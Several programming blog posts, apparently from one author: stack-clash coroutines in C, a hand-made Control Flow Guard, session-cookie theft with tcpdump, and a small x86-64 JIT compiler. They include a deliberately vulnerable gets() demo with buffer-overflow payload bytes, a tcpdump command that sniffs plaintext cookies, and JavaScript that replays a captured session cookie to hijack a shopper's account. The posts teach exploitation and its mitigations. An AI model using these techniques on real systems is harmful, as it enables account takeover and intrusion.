In practice, this sort of program wouldn’t have sensitive data resident in memory. Instead an attacker would target the program’s stack with those s commands — specifically the return pointers — and perform a ROP attack against the application. With the exploit header above and a platform where long the same size as a size_t, the program will behave as if all available memory has been allocated to the image, so the s command could be used to poke custom values anywhere in memory. This is a much more complicated exploit, and it has to contend with ASLR and random stack gap, but it’s feasible.

Stack Clashing for Fun and Profit

2017-06-21T05:28:56Z

Stack clashing has been in the news lately due to some recently discovered vulnerablities along with proof-of-concept exploits. As the announcement itself notes, this is not a new issue, though this appears to be the first time it’s been given this particular name. I do know of one “good” use of stack clashing, where it’s used for something productive than as part of an attack. In this article I’ll explain how it works.

You can find the complete code for this article here, ready to run:

https://github.com/skeeto/stack-clash-coroutine

But first, what is a stack clash? Here’s a rough picture of the typical way process memory is laid out. The stack starts at a high memory address and grows downwards. Code and static data sit at low memory, with a brk pointer growing upward to make small allocations. In the middle is the heap, where large allocations and memory mappings take place.

Below the stack is a slim guard page that divides the stack and the region of memory reserved for the heap. Reading or writing to that memory will trap, causing the program to crash or some special action to be taken. The goal is to prevent the stack from growing into the heap, which could cause all sorts of trouble, like security issues.

The problem is that this thin guard page isn’t enough. It’s possible to put a large allocation on the stack, never read or write to it, and completely skip over the guard page, such that the heap and stack overlap without detection.

Once this happens, writes into the heap will change memory on the stack and vice versa. If an attacker can cause the program to make such a large allocation on the stack, then legitimate writes into memory on the heap can manipulate local variables or return pointers, changing the program’s control flow. This can bypass buffer overflow protections, such as stack canaries.

Binary trees and coroutines

Now, I’m going to abruptly change topics to discuss binary search trees. We’ll get back to stack clash in a bit. Suppose we have a binary tree which we would like to iterate depth-first. For this demonstration, here’s the C interface to the binary tree.

struct tree {
    struct tree *left;
    struct tree *right;
    char *key;
    char *value;
};

void  tree_insert(struct tree **, char *k, char *v);
char *tree_find(struct tree *, char *k);
void  tree_visit(struct tree *, void (*f)(char *, char *));
void  tree_destroy(struct tree *);

An empty tree is the NULL pointer, hence the double-pointer for insert. In the demonstration it’s an unbalanced search tree, but this could very well be a balanced search tree with the addition of another field on the structure.

For the traversal, first visit the root node, then traverse its left tree, and finally traverse its right tree. It makes for a simple, recursive definition — the sort of thing you’d teach a beginner. Here’s a definition that accepts a callback, which the caller will use to visit each key/value in the tree. This really is as simple as it gets.

void
tree_visit(struct tree *t, void (*f)(char *, char *))
{
    if (t) {
        f(t->key, t->value);
        tree_visit(t->left, f);
        tree_visit(t->right, f);
    }
}

Unfortunately this isn’t so convenient for the caller, who has to split off a callback function that lacks context, then hand over control to the traversal function.

void
printer(char *k, char *v)
{
    printf("%s = %s\n", k, v);
}

void
print_tree(struct tree *tree)
{
    tree_visit(tree, printer);
}

Usually it’s much nicer for the caller if instead it’s provided an iterator, which the caller can invoke at will. Here’s an interface for it, just two functions.

struct tree_it *tree_iterator(struct tree *);
int             tree_next(struct tree_it *, char **k, char **v);

The first constructs an iterator object, and the second one visits a key/value pair each time it’s called. It returns 0 when traversal is complete, automatically freeing any resources associated with the iterator.

The caller now looks like this:

    char *k, *v;
    struct tree_it *it = tree_iterator(tree);
    while (tree_next(it, &k, &v))
        printf("%s = %s\n", k, v);

Notice I haven’t defined struct tree_it. That’s because I’ve got four different implementations, each taking a different approach. The last one will use stack clashing.

Manual State Tracking

With just the standard facilities provided by C, there’s a some manual bookkeeping that has to take place in order to convert the recursive definition into an iterator. Depth-first traversal is a stack-oriented process, and with recursion the stack is implicit in the call stack. As an iterator, the traversal stack needs to be managed explicitly. The iterator needs to keep track of the path it took so that it can backtrack, which means keeping track of parent nodes as well as which branch was taken.

Here’s my little implementation, which, to keep things simple, has a hard depth limit of 32. It’s structure definition includes a stack of node pointers, and 2 bits of information per visited node, stored across a 64-bit integer.

struct tree_it {
    struct tree *stack[32];
    unsigned long long state;
    int nstack;
};

struct tree_it *
tree_iterator(struct tree *t)
{
    struct tree_it *it = malloc(sizeof(*it));
    it->stack[0] = t;
    it->state = 0;
    it->nstack = 1;
    return it;
}

The 2 bits track three different states for each visited node:

Visit the current node
Traverse the left tree
Traverse the right tree

It works out to the following. Don’t worry too much about trying to understand how this works. My point is to demonstrate that converting the recursive definition into an iterator complicates the implementation.

int
tree_next(struct tree_it *it, char **k, char **v)
{
    while (it->nstack) {
        int shift = (it->nstack - 1) * 2;
        int state = 3u & (it->state >> shift);
        struct tree *t = it->stack[it->nstack - 1];
        it->state += 1ull << shift;
        switch (state) {
            case 0:
                *k = t->key;
                *v = t->value;
                if (t->left) {
                    it->stack[it->nstack++] = t->left;
                    it->state &= ~(3ull << (shift + 2));
                }
                return 1;
            case 1:
                if (t->right) {
                    it->stack[it->nstack++] = t->right;
                    it->state &= ~(3ull << (shift + 2));
                }
                break;
            case 2:
                it->nstack--;
                break;
        }
    }
    free(it);
    return 0;
}

Wouldn’t it be nice to keep both the recursive definition while also getting an iterator? There’s an exact solution to that: coroutines.

Coroutines

C doesn’t come with coroutines, but there are a number of libraries available. We can also build our own coroutines. One way to do that is with user contexts () provided by the X/Open System Interfaces Extension (XSI), an extension to POSIX. This set of functions allow programs to create their own call stacks and switch between them. That’s the key ingredient for coroutines. Caveat: These functions aren’t widely available, and probably shouldn’t be used in new code.

Here’s my iterator structure definition.

#define _XOPEN_SOURCE 600
#include 

struct tree_it {
    char *k;
    char *v;
    ucontext_t coroutine;
    ucontext_t yield;
};

It needs one context for the original stack and one context for the iterator’s stack. Each time the iterator is invoked, it the program will switch to the other stack, find the next value, then switch back. This process is called yielding. Values are passed between context using the k (key) and v (value) fields on the iterator.

Before I get into initialization, here’s the actual traversal coroutine. It’s nearly the same as the original recursive definition except for the swapcontext(). This is the yield, pausing execution and sending control back to the caller. The current context is saved in the first argument, and the second argument becomes the current context.

static void
coroutine(struct tree *t, struct tree_it *it)
{
    if (t) {
        it->k = t->key;
        it->v = t->value;
        swapcontext(&it->coroutine, &it->yield);
        coroutine(t->left, it);
        coroutine(t->right, it);
    }
}

While the actual traversal is simple again, initialization is more complicated. The first problem is that there’s no way to pass pointer arguments to the coroutine. Technically only int arguments are permitted. (All the online tutorials get this wrong.) To work around this problem, I smuggle the arguments in as global variables. This would cause problems should two different threads try to create iterators at the same time, even on different trees.

static struct tree *tree_arg;
static struct tree_it *tree_it_arg;

static void
coroutine_init(void)
{
    coroutine(tree_arg, tree_it_arg);
}

The stack has to be allocated manually, which I do with a call to malloc(). Nothing fancy is needed, though this means the new stack won’t have a guard page. For the stack size, I use the suggested value of SIGSTKSZ. The makecontext() function is what creates the new context from scratch, but the new context must first be initialized with getcontext(), even though that particular snapshot won’t actually be used.

struct tree_it *
tree_iterator(struct tree *t)
{
    struct tree_it *it = malloc(sizeof(*it));
    it->coroutine.uc_stack.ss_sp = malloc(SIGSTKSZ);
    it->coroutine.uc_stack.ss_size = SIGSTKSZ;
    it->coroutine.uc_link = &it->yield;
    getcontext(&it->coroutine);
    makecontext(&it->coroutine, coroutine_init, 0);
    tree_arg = t;
    tree_it_arg = it;
    return it;
}

Notice I gave it a function pointer, a lot like I’m starting a new thread. This is no coincidence. There’s a lot of similarity between coroutines and multiple threads, as you’ll soon see.

Finally the iterator function itself. Since NULL isn’t a valid key, it initializes the key to NULL before yielding to the iterator context. If the iterator has no more nodes to visit, it doesn’t set the key, which can be detected when control returns.

int
tree_next(struct tree_it *it, char **k, char **v)
{
    it->k = 0;
    swapcontext(&it->yield, &it->coroutine);
    if (it->k) {
        *k = it->k;
        *v = it->v;
        return 1;
    } else {
        free(it->coroutine.uc_stack.ss_sp);
        free(it);
        return 0;
    }
}

That’s all it takes to create and operate a coroutine in C, provided you’re on a system with these XSI extensions.

Semaphores

Instead of a coroutine, we could just use actual threads and a couple of semaphores to synchronize them. This is a heavy implementation and also probably shouldn’t be used in practice, but at least it’s fully portable.

Here’s the structure definition:

struct tree_it {
    struct tree *t;
    char *k;
    char *v;
    sem_t visitor;
    sem_t main;
    pthread_t thread;
};

The main thread will wait on one semaphore and the iterator thread will wait on the other. This should sound very familiar.

The actual traversal function looks the same, but with sem_post() and sem_wait() as the yield.

static void
visit(struct tree *t, struct tree_it *it)
{
    if (t) {
        it->k = t->key;
        it->v = t->value;
        sem_post(&it->main);
        sem_wait(&it->visitor);
        visit(t->left, it);
        visit(t->right, it);
    }
}

There’s a separate function to initialize the iterator context again.

static void *
thread_entrance(void *arg)
{
    struct tree_it *it = arg;
    sem_wait(&it->visitor);
    visit(it->t, it);
    sem_post(&it->main);
    return 0;
}

Creating the iterator only requires initializing the semaphores and creating the thread:

struct tree_it *
tree_iterator(struct tree *t)
{
    struct tree_it *it = malloc(sizeof(*it));
    it->t = t;
    sem_init(&it->visitor, 0, 0);
    sem_init(&it->main, 0, 0);
    pthread_create(&it->thread, 0, thread_entrance, it);
    return it;
}

The iterator function looks just like the coroutine version.

int
tree_next(struct tree_it *it, char **k, char **v)
{
    it->k = 0;
    sem_post(&it->visitor);
    sem_wait(&it->main);
    if (it->k) {
        *k = it->k;
        *v = it->v;
        return 1;
    } else {
        pthread_join(it->thread, 0);
        sem_destroy(&it->main);
        sem_destroy(&it->visitor);
        free(it);
        return 0;
    }
}

Overall, this is almost identical to the coroutine version.

Coroutines using stack clashing

Finally I can tie this back into the topic at hand. Without either XSI extensions or Pthreads, we can (usually) create coroutines by abusing setjmp() and longjmp(). Technically this violates two of the C’s rules and relies on undefined behavior, but it generally works. This is not my own invention, and it dates back to at least 2010.

From the very beginning, C has provided a crude “exception” mechanism that allows the stack to be abruptly unwound back to a previous state. It’s a sort of non-local goto. Call setjmp() to capture an opaque jmp_buf object to be used in the future. This function returns 0 this first time. Hand that value to longjmp() later, even in a different function, and setjmp() will return again, this time with a non-zero value.

It’s technically unsuitable for coroutines because the jump is a one-way trip. The unwound stack invalidates any jmp_buf that was created after the target of the jump. In practice, though, you can still use these jumps, which is one rule being broken.

That’s where stack clashing comes into play. In order for it to be a proper coroutine, it needs to have its own stack. But how can we do that with these primitive C utilities? Extend the stack to overlap the heap, call setjmp() to capture a coroutine on it, then return. Generally we can get away with using longjmp() to return to this heap-allocated stack.

Here’s my iterator definition for this one. Like the XSI context struct, this has two jmp_buf “contexts.” The stack holds the iterator’s stack buffer so that it can be freed, and the gap field will be used to prevent the optimizer from spoiling our plans.

struct tree_it {
    char *k;
    char *v;
    char *stack;
    volatile char *gap;
    jmp_buf coroutine;
    jmp_buf yield;
};

The coroutine looks familiar again. This time the yield is performed with setjmmp() and longjmp(), just like swapcontext(). Remember that setjmp() returns twice, hence the branch. The longjmp() never returns.

static void
coroutine(struct tree *t, struct tree_it *it)
{
    if (t) {
        it->k = t->key;
        it->v = t->value;
        if (!setjmp(it->coroutine))
            longjmp(it->yield, 1);
        coroutine(t->left, it);
        coroutine(t->right, it);
    }
}

Next is the tricky part to cause the stack clash. First, allocate the new stack with malloc() so that we can get its address. Then use a local variable on the stack to determine how much the stack needs to grow in order to overlap with the allocation. Taking the difference between these pointers is illegal as far as the language is concerned, making this the second rule I’m breaking. I can imagine an implementation where the stack and heap are in two separate kinds of memory, and it would be meaningless to take the difference. I don’t actually have to imagine very hard, because this is actually how it used to work on the 8086 with its segmented memory architecture.

struct tree_it *
tree_iterator(struct tree *t)
{
    struct tree_it *it = malloc(sizeof(*it));
    it->stack = malloc(STACK_SIZE);
    char marker;
    char gap[&marker - it->stack - STACK_SIZE];
    it->gap = gap; // prevent optimization
    if (!setjmp(it->yield))
        coroutine_init(t, it);
    return it;
}

I’m using a variable-length array (VLA) named gap to indirectly control the stack pointer, moving it over the heap. I’m assuming the stack grows downward, since otherwise the sign would be wrong.

The compiler is smart and will notice I’m not actually using gap, and it’s happy to throw it away. In fact, it’s vitally important that I don’t touch it since the guard page, along with a bunch of unmapped memory, is actually somewhere in the middle of that array. I only want the array for its side effect, but that side effect isn’t officially supported, which means the optimizer doesn’t need to consider it in its decisions. To inhibit the optimizer, I store the array’s address where someone might potentially look at it, meaning the array has to exist.

Finally, the iterator function looks just like the others, again.

int
tree_next(struct tree_it *it, char **k, char **v)
{
    it->k = 0;
    if (!setjmp(it->yield))
        longjmp(it->coroutine, 1);
    if (it->k) {
        *k = it->k;
        *v = it->v;
        return 1;
    } else {
        free(it->stack);
        free(it);
        return 0;
    }
}

And that’s it: a nasty hack using a stack clash to create a context for a setjmp()+longjmp() coroutine.

Manual Control Flow Guard in C

2017-01-21T22:44:15Z

Recent versions of Windows have a new exploit mitigation feature called Control Flow Guard (CFG). Before an indirect function call — e.g. function pointers and virtual functions — the target address checked against a table of valid call addresses. If the address isn’t the entry point of a known function, then the program is aborted.

If an application has a buffer overflow vulnerability, an attacker may use it to overwrite a function pointer and, by the call through that pointer, control the execution flow of the program. This is one way to initiate a Return Oriented Programming (ROP) attack, where the attacker constructs a chain of gadget addresses — a gadget being a couple of instructions followed by a return instruction, all in the original program — using the indirect call as the starting point. The execution then flows from gadget to gadget so that the program does what the attacker wants it to do, all without the attacker supplying any code.

The two most widely practiced ROP attack mitigation techniques today are Address Space Layout Randomization (ASLR) and stack protectors. The former randomizes the base address of executable images (programs, shared libraries) so that process memory layout is unpredictable to the attacker. The addresses in the ROP attack chain depend on the run-time memory layout, so the attacker must also find and exploit an information leak to bypass ASLR.

For stack protectors, the compiler allocates a canary on the stack above other stack allocations and sets the canary to a per-thread random value. If a buffer overflows to overwrite the function return pointer, the canary value will also be overwritten. Before the function returns by the return pointer, it checks the canary. If the canary doesn’t match the known value, the program is aborted.

CFG works similarly — performing a check prior to passing control to the address in a pointer — except that instead of checking a canary, it checks the target address itself. This is a lot more sophisticated, and, unlike a stack canary, essentially requires coordination by the platform. The check must be informed on all valid call targets, whether from the main program or from shared libraries.

While not (yet?) widely deployed, a worthy mention is Clang’s SafeStack. Each thread gets two stacks: a “safe stack” for return pointers and other safely-accessed values, and an “unsafe stack” for buffers and such. Buffer overflows will corrupt other buffers but will not overwrite return pointers, limiting the effect of their damage.

An exploit example

Consider this trivial C program, demo.c:

int
main(void)
{
    char name[8];
    gets(name);
    printf("Hello, %s.\n", name);
    return 0;
}

It reads a name into a buffer and prints it back out with a greeting. While trivial, it’s far from innocent. That naive call to gets() doesn’t check the bounds of the buffer, introducing an exploitable buffer overflow. It’s so obvious that both the compiler and linker will yell about it.

For simplicity, suppose the program also contains a dangerous function.

void
self_destruct(void)
{
    puts("**** GO BOOM! ****");
}

The attacker can use the buffer overflow to call this dangerous function.

To make this attack simpler for the sake of the article, assume the program isn’t using ASLR (e.g. without -fpie/-pie, or with -fno-pie/-no-pie). For this particular example, I’ll also explicitly disable buffer overflow protections (e.g. _FORTIFY_SOURCE and stack protectors).

$ gcc -Os -fno-pie -D_FORTIFY_SOURCE=0 -fno-stack-protector \
      -o demo demo.c

First, find the address of self_destruct().

$ readelf -a demo | grep self_destruct
46: 00000000004005c5  10 FUNC  GLOBAL DEFAULT 13 self_destruct

This is on x86-64, so it’s a 64-bit address. The size of the name buffer is 8 bytes, and peeking at the assembly I see an extra 8 bytes allocated above, so there’s 16 bytes to fill, then 8 bytes to overwrite the return pointer with the address of self_destruct.

$ echo -ne 'xxxxxxxxyyyyyyyy\xc5\x05\x40\x00\x00\x00\x00\x00' > boom
$ ./demo < boom
Hello, xxxxxxxxyyyyyyyy?@.
**** GO BOOM! ****
Segmentation fault

With this input I’ve successfully exploited the buffer overflow to divert control to self_destruct(). When main tries to return into libc, it instead jumps to the dangerous function, and then crashes when that function tries to return — though, presumably, the system would have self-destructed already. Turning on the stack protector stops this exploit.

$ gcc -Os -fno-pie -D_FORTIFY_SOURCE=0 -fstack-protector \
      -o demo demo.c
$ ./demo < boom
Hello, xxxxxxxxaaaaaaaa?@.
*** stack smashing detected ***: ./demo terminated
======= Backtrace: =========
... lots of backtrace stuff ...

The stack protector successfully blocks the exploit. To get around this, I’d have to either guess the canary value or discover an information leak that reveals it.

The stack protector transformed the program into something that looks like the following:

int
main(void)
{
    long __canary = __get_thread_canary();
    char name[8];
    gets(name);
    printf("Hello, %s.\n", name);
    if (__canary != __get_thread_canary())
        abort();
    return 0;
}

However, it’s not actually possible to implement the stack protector within C. Buffer overflows are undefined behavior, and a canary is only affected by a buffer overflow, allowing the compiler to optimize it away.

Function pointers and virtual functions

After the attacker successfully self-destructed the last computer, upper management has mandated password checks before all self-destruction procedures. Here’s what it looks like now:

void
self_destruct(char *password)
{
    if (strcmp(password, "12345") == 0)
        puts("**** GO BOOM! ****");
}

The password is hardcoded, and it’s the kind of thing an idiot would have on his luggage, but assume it’s actually unknown to the attacker. Especially since, as I’ll show shortly, it won’t matter. Upper management has also mandated stack protectors, so assume that’s enabled from here on.

Additionally, the program has evolved a bit, and now uses a function pointer for polymorphism.

struct greeter {
    char name[8];
    void (*greet)(struct greeter *);
};

void
greet_hello(struct greeter *g)
{
    printf("Hello, %s.\n", g->name);
}

void
greet_aloha(struct greeter *g)
{
    printf("Aloha, %s.\n", g->name);
}

There’s now a greeter object and the function pointer makes its behavior polymorphic. Think of it as a hand-coded virtual function for C. Here’s the new (contrived) main:

int
main(void)
{
    struct greeter greeter = {.greet = greet_hello};
    gets(greeter.name);
    greeter.greet(&greeter);
    return 0;
}

(In a real program, something else provides greeter and picks its own function pointer for greet.)

Rather than overwriting the return pointer, the attacker has the opportunity to overwrite the function pointer on the struct. Let’s reconstruct the exploit like before.

$ readelf -a demo | grep self_destruct
54: 00000000004006a5  10 FUNC  GLOBAL DEFAULT  13 self_destruct

We don’t know the password, but we do know (from peeking at the disassembly) that the password check is 16 bytes. The attack should instead jump 16 bytes into the function, skipping over the check (0x4006a5 + 16 = 0x4006b5).

$ echo -ne 'xxxxxxxx\xb5\x06\x40\x00\x00\x00\x00\x00' > boom
$ ./demo < boom
**** GO BOOM! ****

Neither the stack protector nor the password were of any help. The stack protector only protects the return pointer, not the function pointer on the struct.

This is where the Control Flow Guard comes into play. With CFG enabled, the compiler inserts a check before calling the greet() function pointer. It must point to the beginning of a known function, otherwise it will abort just like the stack protector. Since the middle of self_destruct() isn’t the beginning of a function, it would abort if this exploit is attempted.

However, I’m on Linux and there’s no CFG on Linux (yet?). So I’ll implement it myself, with manual checks.

Function address bitmap

As described in the PDF linked at the top of this article, CFG on Windows is implemented using a bitmap. Each bit in the bitmap represents 8 bytes of memory. If those 8 bytes contains the beginning of a function, the bit will be set to one. Checking a pointer means checking its associated bit in the bitmap.

For my CFG, I’ve decided to keep the same 8-byte resolution: the bottom three bits of the target address will be dropped. The next 24 bits will be used to index into the bitmap. All other bits in the pointer will be ignored. A 24-bit bit index means the bitmap will only be 2MB.

These 24 bits is perfectly sufficient for 32-bit systems, but it means on 64-bit systems there may be false positives: some addresses will not represent the start of a function, but will have their bit set to 1. This is acceptable, especially because only functions known to be targets of indirect calls will be registered in the table, reducing the false positive rate.

Note: Relying on the bits of a pointer cast to an integer is unspecified and isn’t portable, but this implementation will work fine anywhere I would care to use it.

Here are the CFG parameters. I’ve made them macros so that they can easily be tuned at compile-time. The cfg_bits is the integer type backing the bitmap array. The CFG_RESOLUTION is the number of bits dropped, so “3” is a granularity of 8 bytes.

typedef unsigned long cfg_bits;
#define CFG_RESOLUTION  3
#define CFG_BITS        24

Given a function pointer f, this macro extracts the bitmap index.

#define CFG_INDEX(f) \
    (((uintptr_t)f >> CFG_RESOLUTION) & ((1UL << CFG_BITS) - 1))

The CFG bitmap is just an array of integers. Zero it to initialize.

struct cfg {
    cfg_bits bitmap[(1UL << CFG_BITS) / (sizeof(cfg_bits) * CHAR_BIT)];
};

Functions are manually registered in the bitmap using cfg_register().

void
cfg_register(struct cfg *cfg, void *f)
{
    unsigned long i = CFG_INDEX(f);
    size_t z = sizeof(cfg_bits) * CHAR_BIT;
    cfg->bitmap[i / z] |= 1UL << (i % z);
}

Because functions are registered at run-time, it’s fully compatible with ASLR. If ASLR is enabled, the bitmap will be a little different each run. On the same note, it may be worth XORing each bitmap element with a random, run-time value — along the same lines as the stack canary value — to make it harder for an attacker to manipulate the bitmap should he get the ability to overwrite it by a vulnerability. Alternatively the bitmap could be switched to read-only (e.g. mprotect()) once everything is registered.

And finally, the check function, used immediately before indirect calls. It ensures f was previously passed to cfg_register() (except for false positives, as discussed). Since it will be invoked often, it needs to be fast and simple.

void
cfg_check(struct cfg *cfg, void *f)
{
    unsigned long i = CFG_INDEX(f);
    size_t z = sizeof(cfg_bits) * CHAR_BIT;
    if (!((cfg->bitmap[i / z] >> (i % z)) & 1))
        abort();
}

And that’s it! Now augment main to make use of it:

struct cfg cfg;

int
main(void)
{
    cfg_register(&cfg, self_destruct);  // to prove this works
    cfg_register(&cfg, greet_hello);
    cfg_register(&cfg, greet_aloha);

    struct greeter greeter = {.greet = greet_hello};
    gets(greeter.name);
    cfg_check(&cfg, greeter.greet);
    greeter.greet(&greeter);
    return 0;
}

And now attempting the exploit:

$ ./demo < boom
Aborted

Normally self_destruct() wouldn’t be registered since it’s not a legitimate target of an indirect call, but the exploit still didn’t work because it called into the middle of self_destruct(), which isn’t a valid address in the bitmap. The check aborts the program before it can be exploited.

In a real application I would have a global cfg bitmap for the whole program, and define cfg_check() in a header as an inline function.

Despite being possible implement in straight C without the help of the toolchain, it would be far less cumbersome and error-prone to let the compiler and platform handle Control Flow Guard. That’s the right place to implement it.

Update: Ted Unangst pointed out OpenBSD performing a similar check in its mbuf library. Instead of a bitmap, the function pointer is replaced with an index into an array of registered function pointers. That approach is cleaner, more efficient, completely portable, and has no false positives.

Stealing Session Cookies with Tcpdump

2016-06-23T21:55:24Z

My wife was shopping online for running shoes when she got this classic Firefox pop-up.

These days this is usually just a server misconfiguration annoyance. However, she was logged into an account, which included a virtual shopping cart and associated credit card payment options, meaning actual sensitive information would be at risk.

The main culprit was the website’s search feature, which wasn’t transmitted over HTTPS. There’s an HTTPS version of the search (which I found manually), but searches aren’t directed there. This means it’s also vulnerable to SSL stripping.

Fortunately Firefox warns about the issue and requires a positive response before continuing. Neither Chrome nor Internet Explorer get this right. Both transmit session cookies in the clear without warning, then subtly mention it after the fact. She may not have even noticed the problem (and then asked me about it) if not for that pop-up.

I contacted the website’s technical support two weeks ago and they never responded, nor did they fix any of their issues, so for now you can see this all for yourself.

Finding the session cookies

To prove to myself that this whole situation was really as bad as it looked, I decided to steal her session cookie and use it to manipulate her shopping cart. First I hit F12 in her browser to peek at the network headers. Perhaps nothing important was actually sent in the clear.

The session cookie (red box) was definitely sent in the request. I only need to catch it on the network. That’s an easy job for tcpdump.

tcpdump -A -l dst www.roadrunnersports.com and dst port 80 | \
    grep "^Cookie: "

This command tells tcpdump to dump selected packet content as ASCII (-A). It also sets output to line-buffered so that I can see packets as soon as they arrive (-l). The filter will only match packets going out to this website and only on port 80 (HTTP), so I won’t see any extraneous noise (dst and dst port ). Finally, I crudely run that all through grep to see if any cookies fall out.

On the next insecure page load I get this (wrapped here for display) spilling many times into my terminal:

Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; visitSo
  urce=Registered; RoadRunnerTestCookie=true; mobify-path=; __cy_d=09A
  78CC1-AF18-40BC-8752-B2372492EDE5; _cybskt=; _cycurrln=; wpCart=0; _
  up=1.2.387590744.1465699388; __distillery=a859d68_771ff435-d359-489a
  -bf1a-1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c; DYN_USER_ID=16328657
  52; DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4

That’s a bingo! I massage this into a bit of JavaScript, go to the store page in my own browser, and dump it in the developer console. I don’t know which cookies are important, but that doesn’t matter. I take them all.

document.cookie = "Cookie: JSESSIONID=99004F61A4ED162641DC36046A" +
                  "C81EAB.prd_rrs12;";
document.cookie = "visitSource=Registered";
document.cookie = "RoadRunnerTestCookie=true";
document.cookie = "mobify-path=";
document.cookie = "__cy_d=09A78CC1-AF18-40BC-8752-B2372492EDE5";
document.cookie = "_cybskt=";
document.cookie = "_cycurrln=";
document.cookie = "wpCart=0";
document.cookie = "_up=1.2.387590744.1465699388";
document.cookie = "__distillery=a859d68_771ff435-d359-489a-bf1a-" +
                  "1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c";
document.cookie = "DYN_USER_ID=1632865752";
document.cookie = "DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4";

Refresh the page and now I’m logged in. I can see what’s in the shopping cart. I can add and remove items. I can checkout and complete the order. My browser is as genuine as hers.

How to fix it

The quick and dirty thing to do is set the Secure and HttpOnly flags on all cookies. The first prevents cookies from being sent in the clear, where a passive observer might see them. The second prevents the JavaScript from accessing them, since an active attacker could inject their own JavaScript in the page. Customers would appear to be logged out on plain HTTP pages, which is confusing.

However, since this is an online store, there’s absolutely no excuse to be serving anything over plain HTTP. This just opens customers up to downgrade attacks. The long term solution, in addition to the cookie flags above, is to redirect all HTTP requests to HTTPS and never serve or request content over HTTP, especially not executable content like JavaScript.

A Basic Just-In-Time Compiler

2015-03-19T04:57:55Z

This article was discussed on Hacker News and on reddit.

Monday’s /r/dailyprogrammer challenge was to write a program to read a recurrence relation definition and, through interpretation, iterate it to some number of terms. It’s given an initial term (u(0)) and a sequence of operations, f, to apply to the previous term (u(n + 1) = f(u(n))) to compute the next term. Since it’s an easy challenge, the operations are limited to addition, subtraction, multiplication, and division, with one operand each.

For example, the relation u(n + 1) = (u(n) + 2) * 3 - 5 would be input as +2 *3 -5. If u(0) = 0 then,

u(1) = 1
u(2) = 4
u(3) = 13
u(4) = 40
u(5) = 121
…

Rather than write an interpreter to apply the sequence of operations, for my submission (mirror) I took the opportunity to write a simple x86-64 Just-In-Time (JIT) compiler. So rather than stepping through the operations one by one, my program converts the operations into native machine code and lets the hardware do the work directly. In this article I’ll go through how it works and how I did it.

Update: The follow-up challenge uses Reverse Polish notation to allow for more complicated expressions. I wrote another JIT compiler for my submission (mirror).

Allocating Executable Memory

Modern operating systems have page-granularity protections for different parts of process memory: read, write, and execute. Code can only be executed from memory with the execute bit set on its page, memory can only be changed when its write bit is set, and some pages aren’t allowed to be read. In a running process, the pages holding program code and loaded libraries will have their write bit cleared and execute bit set. Most of the other pages will have their execute bit cleared and their write bit set.

The reason for this is twofold. First, it significantly increases the security of the system. If untrusted input was read into executable memory, an attacker could input machine code (shellcode) into the buffer, then exploit a flaw in the program to cause control flow to jump to and execute that code. If the attacker is only able to write code to non-executable memory, this attack becomes a lot harder. The attacker has to rely on code already loaded into executable pages (return-oriented programming).

Second, it catches program bugs sooner and reduces their impact, so there’s less chance for a flawed program to accidentally corrupt user data. Accessing memory in an invalid way will causes a segmentation fault, usually leading to program termination. For example, NULL points to a special page with read, write, and execute disabled.

An Instruction Buffer

Memory returned by malloc() and friends will be writable and readable, but non-executable. If the JIT compiler allocates memory through malloc(), fills it with machine instructions, and jumps to it without doing any additional work, there will be a segmentation fault. So some different memory allocation calls will be made instead, with the details hidden behind an asmbuf struct.

#define PAGE_SIZE 4096

struct asmbuf {
    uint8_t code[PAGE_SIZE - sizeof(uint64_t)];
    uint64_t count;
};

To keep things simple here, I’m just assuming the page size is 4kB. In a real program, we’d use sysconf(_SC_PAGESIZE) to discover the page size at run time. On x86-64, pages may be 4kB, 2MB, or 1GB, but this program will work correctly as-is regardless.

Instead of malloc(), the compiler allocates memory as an anonymous memory map (mmap()). It’s anonymous because it’s not backed by a file.

struct asmbuf *
asmbuf_create(void)
{
    int prot = PROT_READ | PROT_WRITE;
    int flags = MAP_ANONYMOUS | MAP_PRIVATE;
    return mmap(NULL, PAGE_SIZE, prot, flags, -1, 0);
}

Windows doesn’t have POSIX mmap(), so on that platform we use VirtualAlloc() instead. Here’s the equivalent in Win32.

struct asmbuf *
asmbuf_create(void)
{
    DWORD type = MEM_RESERVE | MEM_COMMIT;
    return VirtualAlloc(NULL, PAGE_SIZE, type, PAGE_READWRITE);
}

Anyone reading closely should notice that I haven’t actually requested that the memory be executable, which is, like, the whole point of all this! This was intentional. Some operating systems employ a security feature called W^X: “write xor execute.” That is, memory is either writable or executable, but never both at the same time. This makes the shellcode attack I described before even harder. For well-behaved JIT compilers it means memory protections need to be adjusted after code generation and before execution.

The POSIX mprotect() function is used to change memory protections.

void
asmbuf_finalize(struct asmbuf *buf)
{
    mprotect(buf, sizeof(*buf), PROT_READ | PROT_EXEC);
}

Or on Win32 (that last parameter is not allowed to be NULL),

void
asmbuf_finalize(struct asmbuf *buf)
{
    DWORD old;
    VirtualProtect(buf, sizeof(*buf), PAGE_EXECUTE_READ, &old);
}

Finally, instead of free() it gets unmapped.

void
asmbuf_free(struct asmbuf *buf)
{
    munmap(buf, PAGE_SIZE);
}

And on Win32,

void
asmbuf_free(struct asmbuf *buf)
{
    VirtualFree(buf, 0, MEM_RELEASE);
}

I won’t list the definitions here, but there are two “methods” for inserting instructions and immediate values into the buffer. This will be raw machine code, so the caller will be acting a bit like an assembler.

asmbuf_ins(struct asmbuf *, int size, uint64_t ins);
asmbuf_immediate(struct asmbuf *, int size, const void *value);

Calling Conventions

We’re only going to be concerned with three of x86-64’s many registers: rdi, rax, and rdx. These are 64-bit (r) extensions of the original 16-bit 8086 registers. The sequence of operations will be compiled into a function that we’ll be able to call from C like a normal function. Here’s what it’s prototype will look like. It takes a signed 64-bit integer and returns a signed 64-bit integer.

long recurrence(long);

The System V AMD64 ABI calling convention says that the first integer/pointer function argument is passed in the rdi register. When our JIT compiled program gets control, that’s where its input will be waiting. According to the ABI, the C program will be expecting the result to be in rax when control is returned. If our recurrence relation is merely the identity function (it has no operations), the only thing it will do is copy rdi to rax.

mov   rax, rdi

There’s a catch, though. You might think all the mucky platform-dependent stuff was encapsulated in asmbuf. Not quite. As usual, Windows is the oddball and has its own unique calling convention. For our purposes here, the only difference is that the first argument comes in rcx rather than rdi. Fortunately this only affects the very first instruction and the rest of the assembly remains the same.

The very last thing it will do, assuming the result is in rax, is return to the caller.

ret

